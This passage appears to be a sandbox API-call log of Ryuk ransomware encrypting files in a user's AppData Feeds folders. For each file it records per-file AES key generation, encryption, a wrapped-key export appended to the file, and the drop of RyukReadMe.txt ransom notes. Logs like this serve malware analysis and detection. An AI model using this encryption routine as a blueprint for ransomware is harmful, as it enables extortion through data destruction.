[0141.507] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.507] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.507] CloseHandle (hObject=0x198) returned 1 [0141.523] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.527] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.527] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.528] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", dwFileAttributes=0x80) returned 1 [0141.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.528] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=28672) returned 1 [0141.528] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=28672) returned 1 [0141.528] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.528] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.529] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.529] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.529] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.530] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.530] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x7000, lpOverlapped=0x0) returned 1 [0141.530] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.530] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x7010) returned 1 [0141.531] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.531] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x7010, lpOverlapped=0x0) returned 1 [0141.531] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.531] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.531] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.531] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.531] CloseHandle (hObject=0x198) returned 1 [0141.562] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.566] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.566] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.566] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.566] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.566] SetLastError (dwErrCode=0x0) [0141.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.567] GetLastError () returned 0x0 [0141.567] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.568] CloseHandle (hObject=0x194) returned 1 [0141.568] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.568] SetLastError (dwErrCode=0x0) [0141.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.568] GetLastError () returned 0xb7 [0141.568] CloseHandle (hObject=0x194) returned 1 [0141.569] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.569] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.569] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.569] SetLastError (dwErrCode=0x0) [0141.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.569] GetLastError () returned 0x0 [0141.569] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.570] CloseHandle (hObject=0x198) returned 1 [0141.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.571] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.571] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.571] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms", dwFileAttributes=0x80) returned 1 [0141.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.573] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=32768) returned 1 [0141.573] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=32768) returned 1 [0141.573] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.573] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.574] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.574] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.574] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.575] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.575] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x8000, lpOverlapped=0x0) returned 1 [0141.576] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.576] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x8010) returned 1 [0141.576] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.576] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x8010, lpOverlapped=0x0) returned 1 [0141.577] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.577] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.577] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.577] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.577] CloseHandle (hObject=0x19c) returned 1 [0141.596] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.600] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.600] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.600] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.600] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.600] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms", dwFileAttributes=0x80) returned 1 [0141.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.601] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=28672) returned 1 [0141.601] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=28672) returned 1 [0141.602] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x6ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.602] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.603] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.603] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.603] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.603] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.603] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x7000, lpOverlapped=0x0) returned 1 [0141.604] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.604] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x7000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x7010) returned 1 [0141.604] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.604] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x7010, lpOverlapped=0x0) returned 1 [0141.605] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.605] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.605] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.605] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.605] CloseHandle (hObject=0x19c) returned 1 [0141.622] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.626] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.626] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.626] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.626] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.626] SetLastError (dwErrCode=0x0) [0141.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.628] GetLastError () returned 0x0 [0141.628] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.629] CloseHandle (hObject=0x198) returned 1 [0141.629] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.629] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.630] SetLastError (dwErrCode=0x0) [0141.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.630] GetLastError () returned 0xb7 [0141.630] CloseHandle (hObject=0x194) returned 1 [0141.630] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.630] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.630] SetLastError (dwErrCode=0x0) [0141.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.630] GetLastError () returned 0xb7 [0141.630] CloseHandle (hObject=0x190) returned 1 [0141.630] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.630] SetLastError (dwErrCode=0x0) [0141.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.630] GetLastError () returned 0xb7 [0141.630] CloseHandle (hObject=0x190) returned 1 [0141.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.633] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.633] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.633] SetLastError (dwErrCode=0x0) [0141.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.633] GetLastError () returned 0x0 [0141.633] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.634] CloseHandle (hObject=0x194) returned 1 [0141.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.635] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.635] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.635] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.635] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]", dwFileAttributes=0x80) returned 1 [0141.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.635] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=0) returned 1 [0141.635] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=0) returned 1 [0141.635] CloseHandle (hObject=0x198) returned 1 [0141.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.636] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.636] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.636] SetLastError (dwErrCode=0x0) [0141.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.643] GetLastError () returned 0x0 [0141.643] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.644] CloseHandle (hObject=0x194) returned 1 [0141.644] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.644] SetLastError (dwErrCode=0x0) [0141.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.645] GetLastError () returned 0xb7 [0141.645] CloseHandle (hObject=0x194) returned 1 